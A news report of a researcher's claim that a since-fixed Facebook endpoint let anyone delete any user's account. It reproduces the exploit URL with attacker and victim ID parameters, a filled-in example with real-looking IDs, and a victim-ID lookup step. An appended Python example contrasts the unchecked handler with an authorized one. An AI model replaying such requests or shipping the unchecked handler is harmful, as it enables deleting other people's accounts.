Facebook Bug Allows Deleting Any User's Account, Hacker Claims

Recently, a security researcher and bug hunter named Ehraz Ahmed claimed to have found a vulnerability in Facebook.

According to the researcher, he reported this bug to the Facebook security team, but after a long wait the security team replied that the bug works only on test accounts, whereas Ehraz used it to remove real accounts. After the email from the Facebook security team, the bug was fixed.

Ehraz also gave proof of the bug by deleting the "hexgroup" Facebook account:


https://www.google.co.in/#q=facebook.com%2Fhexgroup+

He said that if it were a test account, it would not appear in Google search. The real account can be found at https://www.facebook.com/hexgroup, which is now deactivated, as claimed by him.

He also gave the vulnerable link:

http://www.facebook.com/ajax/whitehat/delete_test_users.php?fb_dtsg=AQA1E-WE&selected_users[0]=[Victims-Profile-ID]&__user=[Attackers-Profile-ID]&__a=1

The profile ID can be fetched using the Facebook Graph:

http://graph.facebook.com/USERNAME

He demoed this bug using a test profile:

Name: Rahul Agnikotri
https://www.facebook.com/hexgroup (Victims-Profile-ID) (Test Profile)
We can remove any account on Facebook, including celebrities.
Attackers-Profile-ID = 1781913563
Victims-Profile-ID = 100001831297334

https://www.facebook.com/ajax/whitehat/delete_test_users.php?fb_dtsg=AQA1E-WE&selected_users[0]=100001831297334&__user=1781913563&__a=1

He also released a video on Vimeo, which can be viewed by entering a password.
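The report implies that the endpoint acted on whatever IDs arrived in selected_users without confirming that they were test users. As an added example (not Facebook's code and not part of the original article; the Account model and both function names are hypothetical), the handler below shows that missing check beside a version that authorizes every target server-side before deleting anything.

```python
# Added illustration with a hypothetical data model; not Facebook's code.
from dataclasses import dataclass
from typing import Optional


@dataclass
class Account:
    user_id: int
    is_test_user: bool = False
    created_by: Optional[int] = None  # developer who created the test user
    deleted: bool = False


class Forbidden(Exception):
    """Raised when a requested target may not be deleted by the requester."""


def delete_test_users_unchecked(db, requester_id, selected_ids):
    # Behaviour consistent with the report: every submitted ID is trusted.
    for uid in selected_ids:
        db[uid].deleted = True
    return list(selected_ids)


def delete_test_users_checked(db, requester_id, selected_ids):
    # Authorize each target first: it must exist, be flagged as a test
    # user, and have been created by the authenticated requester.
    targets = []
    for uid in selected_ids:
        acct = db.get(uid)
        if acct is None or not acct.is_test_user or acct.created_by != requester_id:
            raise Forbidden(f"user {uid} is not a test user owned by {requester_id}")
        targets.append(acct)
    # All-or-nothing: nothing is deleted unless every target passed.
    for acct in targets:
        acct.deleted = True
    return [a.user_id for a in targets]


def sample_db():
    # Constructed sample data: 1001 is a developer, 2001 is that
    # developer's test user, 3001 is an unrelated real account.
    return {
        1001: Account(1001),
        2001: Account(2001, is_test_user=True, created_by=1001),
        3001: Account(3001),
    }
```

The requester ID passed to the checked handler should come from the authenticated session, not from a client-supplied parameter such as __user.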
